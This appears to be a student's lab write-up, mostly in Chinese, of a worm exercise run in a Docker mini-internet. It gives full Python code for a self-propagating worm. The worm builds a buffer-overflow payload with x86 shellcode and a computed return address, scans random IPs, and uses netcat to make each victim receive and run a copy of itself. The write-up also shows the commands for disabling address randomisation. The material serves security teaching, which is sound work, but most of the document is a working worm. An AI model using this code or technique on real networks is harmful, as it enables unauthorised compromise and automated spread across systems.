Task 1: Get Familiar with the Lab Setup

在nano目录和map目录分别运行docker-compose build && docker-compose up

建立实验环境

中途产生报错,反复运行,直至成功

image-20220819215126795

Task 2: Attack the First Target

首先执行以下指令

 sudo /sbin/sysctl -w kernel.randomize_va_space=0

我们在Labsetup/worm文件夹中提供了一个框架代码。我们将逐步完成这段代码,每项任务一次做一件事。在这个任务中,我们主要完成createBadfile()函数,该函数为缓冲区溢出攻击生成恶意负载。我们将对第一个目标发动攻击。我们可以选择任何宿主作为第一目标。在代码中,我们硬编码了目标10.151.0.71(➀行)。学生们可以随意更改。在后面的任务中,我们将生成目标IP地址,而不是硬编码IP地址

4.1 The Skeleton Code

#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD" 
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines. 
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line. 
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)';                   "
   " ping -q 1.2.3.4;                                          "
   "                                                           *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')


# Create the badfile (the malicious payload)
def createBadfile():
   content = bytearray(0x90 for i in range(500))
   ##################################################################
   # Put the shellcode at the end
   content[500-len(shellcode):] = shellcode

   ret    = 0xffffd608  # Need to change
   offset = 116  # Need to change

   content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
   ##################################################################

   # Save the binary code to file
   with open('badfile', 'wb') as f:
      f.write(content)


# Find the next victim (return an IP address).
# Check to make sure that the target is alive. 
def getNextTarget():
   return '10.151.0.71'


############################################################### 

print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to 
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile 
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)


    # Sleep for 10 seconds before attacking another host
    time.sleep(10) 

    # Remove this line if you want to continue attacking others
    exit(0)

4.2 Creating the badfifile

在任意容器或host上执行

echo hello | nc -w2 10.151.0.71 9090

在dcup界面可以看到信息反馈(降低了缓冲区溢出利用的难度)

image-20220821103835020

ret    = 0xffffd608  # Need to change
offset = 116  # Need to change

ret=(ebp) +16
offset=ebp - bufferaddress +4 =116

4.3 The Shellcode

在任意容器发送badfile

cat badfile | nc 10.151.0.71 9090

可以看到已经成功执行恶意代码

image-20220821103411688

可使用以下代码重启容器
docker restart <container ID>

Task 3: Self Duplication

shellcode负责使目标机器开启8080端口接收文件

   " echo '(^_^) Shellcode is running (^_^)';                   "
   " nc -nvl 8080 > /tmp/worm.py                                "
   "                                                           *"
   "123456789012345678901234567890123456789012345678901234567890"

负责将worm发送至目标机器,完成worm文件的传输

while Ture:
    # Give the shellcode some time to run on the target host
    time.sleep(1)

    #将worm文件发送至目标机器,完成复制
    subprocess.run([f"cat worm.py | nc -w3 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

image-20220821151501581
可以发现文件传输成功

Task 4: Propagation

根据老师上课的课件

def getNextTarget():
    while True:
        x = randint(151, 155)
        y = randint(70, 80)
        ip = f'10.{x}.0.{y}'
        output = subprocess.check_output(f"ping -q -c1 -W1 {ip}",shell=True)
        result = output.find(b'1 received')
        if result == -1 :
            print(f"{ip} is not alive", flush = True)
        else:
            print(f"{ip} is alive,attack start", flush =True)
            return ip

完善蠕虫程序后,演示

执行报错

subprocess.CalledProcessError: Command 'ping -q -c1 -W1 10.151.0.76' returned non-zero exit status 1.

使用try except规避掉程序停止

由于ping的时间不一致导致不在同一时刻闪烁,不过可以看到进程数达到了450,比正常的200多了200多,证明每台docker上都在运行着worm.py

image-20220821182527351

Task 5: Preventing Self Infection

为防止一台机器上重复出现感染,我采用的是创建exist文件表示已运行过该程序的方式

在程序之前加入代码

if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
    
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)

此时进程数趋于稳定,意味着没有重复程序运行

image-20220821192601901

Task 6: Releasing the Worm on the Mini Internet

dcbuild
./z_start.sh

将环境起好

#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD" 
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines. 
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line. 
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)';                   "
   " nc -nvl 8080 > /tmp/worm.py;                               "
   " python3 /tmp/worm.py                                      *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')

if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
    
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)
        
# Create the badfile (the malicious payload)
def createBadfile():
   content = bytearray(0x90 for i in range(500))
   ##################################################################
   # Put the shellcode at the end
   content[500-len(shellcode):] = shellcode

   ret    = 0xffffd608  # Need to change
   offset = 116  # Need to change

   content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
   ##################################################################

   # Save the binary code to file
   with open('badfile', 'wb') as f:
      f.write(content)


# Find the next victim (return an IP address).
# Check to make sure that the target is alive. 
def getNextTarget():
    while True:
        x = randint(151, 180)
        y = randint(70, 100)
        ip = f'10.{x}.0.{y}'
        try:
            output =  subprocess.check_output(f"ping -q -c1 -W1 {ip}", shell=True)
            result = output.find(b'1 received')
            if result == -1 :
                print(f"{ip} is not alive", flush = True)
            else:
                print(f"{ip} is alive,attack start", flush =True)
                return ip
        except subprocess.CalledProcessError as e:
            print(e)
            

############################################################### 

print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to 
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile 
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)

    #将worm文件发送至目标机器,完成复制
    subprocess.run([f"cat worm.py | nc -w5 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10) 

    # Remove this line if you want to continue attacking others
    

image-20220821195611158
内存只有2G,所以运行中途就卡住了。qaq

不过程序肯定是没问题的!

发表评论